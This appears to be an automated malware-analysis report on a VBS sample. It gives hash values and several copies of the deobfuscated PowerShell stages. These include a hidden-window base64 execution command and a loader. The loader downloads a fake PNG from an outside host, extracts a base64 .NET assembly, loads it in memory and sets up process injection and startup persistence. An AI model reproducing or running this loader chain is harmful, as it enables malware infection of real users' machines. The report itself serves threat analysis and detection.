| Hash | Hash Value |
|---|---|
| MD5 | 381ebfe118ddde9f4b3a38d786c875dd |
| Sha1 | 894a7311aecb2090e8c3d8bec4bf42c207093a11 |
| Sha256 | 6bc677ac4c36cb99e3170edb2b29b8e8b47399a2896f8f0c6fa998b4337bcf35 |
| Sha384 | f5ab4eb3bfd38e9b463750399b14d1dbc59f5503f23ea6c12c24a888ebe9a045909965ea22dcf9e5c6e1135d558498e1 |
| Sha512 | 8eab6601d80ea76796a16bcf92fd1a232d422b4e5eb24617b4f967bd04139f6210ddad681494ea8b7d2e175c43cce3e91f286203eaeea3bee9a9abebbd98018d |
| SSDeep | 768:BIGpjh4Pjt4CivtRRpAkkLuZC2KjIibBsD8eFxWirbfUsx6:BI4CivtrfHKZbBM8etrb8o6 |
| TLSH | BF73758BF9D7A262831B64C120D2208714714E70E2365D5FBC4C5F7DAB9CFB8A366789 |
| Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) \| Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://katyache.com/uploads/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduMnbvlGdhR3clZWauFWb5hGdsFWZ39yckF2bsBXdv02bj5SZoNWY5RXYr9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://katyache.com/uploads/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduMnbvlGdhR3clZWauFWb5hGdsFWZ39yckF2bsBXdv02bj5SZoNWY5RXYr9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) \| Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html | 381ebfe118ddde9f4b3a38d786c875dd |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) \| Invoke-Expression" Malicious | 381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | 381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://katyache.com/uploads/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduMnbvlGdhR3clZWauFWb5hGdsFWZ39yckF2bsBXdv02bj5SZoNWY5RXYr9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) Malicious | 381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | 381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://katyache.com/uploads/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduMnbvlGdhR3clZWauFWb5hGdsFWZ39yckF2bsBXdv02bj5SZoNWY5RXYr9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) Malicious | 381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) \| Invoke-Expression" Malicious | 381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | 381ebfe118ddde9f4b3a38d786c875dd > 381ebfe118ddde9f4b3a38d786c875dd.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |